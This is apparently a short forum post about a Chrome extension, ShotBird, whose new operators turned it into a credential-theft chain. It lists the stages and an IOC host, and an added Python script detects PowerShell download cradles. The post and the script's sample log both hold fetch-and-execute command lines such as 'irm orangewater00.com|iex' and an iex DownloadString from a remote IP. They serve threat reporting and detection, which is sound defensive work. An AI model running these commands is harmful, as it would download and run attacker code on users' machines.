Chrome extension sold to new operators became a credential-theft chain (monxresearch-sec.github.io)
1 point by moooooon 110 days ago
1 comment

I found this because the malicious callback scripts left console.logs firing on every page — [superior-grabber] Initializing grabber... visible to anyone who had DevTools open.

Full chain: Chrome extension (ShotBird) sold to new operators → callback-delivered JS → CSP stripping, form data capture, fake update lures → googleupdate.exe → psfx.msi → irm orangewater00.com|iex → second stage with ETW suppression + credential dumping.

IOCs, raw callback scripts, and PE analysis in the repo. Related campaign: https://annex.security/blog/pixel-perfect
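Added example (not from the post or the linked repo): the last stage the post describes is a PowerShell download cradle, `irm orangewater00.com|iex`. The script below scans process-creation command lines for that shape (a remote fetch verb piped or passed into `iex`/`Invoke-Expression`) and separately flags the host named in the post's IOC summary. The log lines are constructed for illustration, and the hostname extraction is a deliberately simple heuristic, not a full PowerShell parser.

```python
"""Flag PowerShell download cradles and a known-bad host in process command lines.

Added example; not code from the HN post or the monxresearch repo.
Assumes one command line per input string (e.g. the CommandLine field of a
Windows 4688 / Sysmon event 1 record). The sample log below is constructed.
"""
import re
from dataclasses import dataclass, field

# Host named in the post's IOC summary (orangewater00.com).
KNOWN_BAD_HOSTS = {"orangewater00.com"}

# Fetch verbs commonly chained into in-memory execution.
FETCH_RE = re.compile(
    r"\b(irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring)\b", re.I)
# In-memory execution of the fetched text.
EXEC_RE = re.compile(r"\b(iex|invoke-expression)\b", re.I)
# Hosts inside explicit URLs ...
URL_RE = re.compile(r"https?://([a-z0-9.-]+)", re.I)
# ... and bare hosts given directly to a fetch verb, as in `irm host|iex`.
BARE_RE = re.compile(
    r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest)\s+(?:-uri\s+)?['\"]?"
    r"(?!https?://)([a-z0-9.-]+)", re.I)


@dataclass
class Finding:
    line_no: int
    reasons: list = field(default_factory=list)
    hosts: list = field(default_factory=list)


def extract_hosts(cmd: str) -> list:
    """Return lowercased hosts referenced by the command line (heuristic)."""
    hosts = URL_RE.findall(cmd) + BARE_RE.findall(cmd)
    return [h.lower() for h in hosts]


def analyze_command(cmd: str):
    """Return (reasons, hosts) for one command line; reasons is empty if benign."""
    reasons = []
    # Fetch alone (e.g. Invoke-WebRequest -OutFile) is common admin activity;
    # only fetch *and* in-memory execute together is treated as a cradle.
    if FETCH_RE.search(cmd) and EXEC_RE.search(cmd):
        reasons.append("download-cradle")
    hosts = extract_hosts(cmd)
    if any(h in KNOWN_BAD_HOSTS for h in hosts):
        reasons.append("known-bad-host")
    return reasons, hosts


def scan_log(lines) -> list:
    """Run analyze_command over every line and collect the flagged ones."""
    findings = []
    for i, line in enumerate(lines, 1):
        reasons, hosts = analyze_command(line)
        if reasons:
            findings.append(Finding(i, reasons, hosts))
    return findings


# Constructed sample command lines (not real telemetry).
SAMPLE_LOG = [
    'powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\scripts\\inventory.ps1',
    'powershell.exe -w hidden -c "irm orangewater00.com|iex"',
    'powershell.exe -c "Invoke-WebRequest https://updates.example.invalid/patch.ps1 -OutFile patch.ps1"',
    'powershell.exe -c "iex (New-Object Net.WebClient).DownloadString(\'http://198.51.100.7/s\')"',
]

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"line {f.line_no}: {', '.join(f.reasons)} hosts={f.hosts}")
```

Lines 2 and 4 of the sample are flagged; line 3 fetches a file to disk without `iex` and is left alone, which keeps the rule from firing on routine `Invoke-WebRequest -OutFile` usage. Hunting on the cradle shape rather than only on the one domain matters here because the post's chain swaps hosts and file names between stages.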